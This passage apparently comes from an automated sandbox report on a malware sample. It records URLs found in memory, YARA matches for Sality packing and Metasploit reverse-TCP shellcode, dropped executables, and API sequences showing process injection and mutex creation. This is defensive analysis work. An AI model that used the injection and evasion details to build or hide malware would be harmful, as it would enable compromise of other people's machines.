            Source: smartscreen.exe, 00000014.00000003.2414981932.00000151ACEC0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://unitedstates4.ss.wd.microsoft.us
            Source: SearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
            Source: SearchApp.exe, 0000000F.00000000.1543263822.000001EC93000000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
            Source: explorer.exe, 0000000A.00000000.1450832815.00000000090F2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
            Source: explorer.exe, 0000000A.00000000.1455294750.000000000C091000.00000004.00000001.00020000.00000000.sdmp, StartMenuExperienceHost.exe, 0000000D.00000000.1499873714.000001A446400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
            Source: SearchApp.exe, 0000000F.00000000.1566609930.000001F49BD00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: SearchApp.exe, 0000000F.00000000.1605212499.000001F4AE90E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.google.www.yahoo.cn.bing.www.baidu.www.bing.www.yandex.google
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/archery-king/cg-9n5gkc4t7lzz0
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/basketball-frvr/cg-9npd4c9369l0
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/bowling-hero/cg-9n4v2151rf31
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/fairyland%3a-merge-%26-magic/cg-9nw8m0c50k4w
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/food-tycoon-frvr/cg-9nf9144n6817
            Source: SearchApp.exe, 0000000F.00000000.1564027510.000001F49B8C1000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1
            Source: SearchApp.exe, 0000000F.00000000.1581241984.000001F49DC6C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play/games/master-chess/cg-9nrl2nj7l6s1F
            Source: SearchApp.exe, 0000000F.00000000.1560705635.000001F49B262000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/de-ch/play?ocid=winpsearchboxexpcta2&cgfrom=cg_dsb_seeMore
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/dhp_l
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/mmxh
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ntp0N
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/spartan/ntpI
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.ng.com
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071B2000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.pollensense.com/
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000F.00000000.1562812972.000001F49B644000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.comey
            Source: SearchApp.exe, 0000000F.00000000.1674049246.000001F4B3224000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://xsts.auth.xboxlive.commy

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPEMatched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            PE file contains section with special chars
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            Source: PfBjDhHzvV.exeStatic PE information: section name:
            PE file has a writeable .text section
            Source: xjjalq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: taqcpb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winysum.exe.35.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winbwxmuq.exe.35.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile created: C:\Windows\46c927Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeFile deleted: C:\Windows\46c927Jump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128E3290_2_0128E329
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_0128B6140_2_0128B614
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01296CD00_2_01296CD0
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 29_2_0241038629_2_02410386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 30_2_0229038630_2_02290386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 31_2_0095038631_2_00950386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 32_2_00BF038632_2_00BF0386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 33_2_0034038633_2_00340386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 34_2_0149038634_2_01490386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_028AE32935_2_028AE329
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_028B6CD035_2_028B6CD0
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_028AB61435_2_028AB614
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 35_2_0247038635_2_02470386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 36_2_00F6038636_2_00F60386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 37_2_021D038637_2_021D0386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 38_2_0293038638_2_02930386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 39_2_0084038639_2_00840386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exeCode function: 40_2_0246038640_2_02460386
            Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
            Source: msedge.exe.0.drStatic PE information: Number of sections : 14 > 10
            Source: PfBjDhHzvV.exeBinary or memory string: OriginalFilename vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234177696.0000000000415000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameab.exeF vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234330420.0000000000417000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameab.exeF vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: xjjalq.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: taqcpb.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winysum.exe.35.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winbwxmuq.exe.35.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.drStatic PE information: Section .text
            Source: xjjalq.exe.0.drStatic PE information: Section .text
            Source: winbwxmuq.exe.35.drStatic PE information: Section .text
            Source: winysum.exe.35.drStatic PE information: Section .text
            Source: taqcpb.exe.0.drStatic PE information: Section .text
            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@3/34@1/51
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,0_2_01291EF6
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeCode function: 0_2_01292514 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,CloseHandle,0_2_01292514
            Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_19_0.pngJump to behavior
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4028_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2572_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_180_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_3496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\upfc.exeM_4064_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_700_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2596_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1240_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6152_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6180_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5836_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5420_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2424_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1212_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_912_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5880_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7160_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5076_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exeMutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6900_
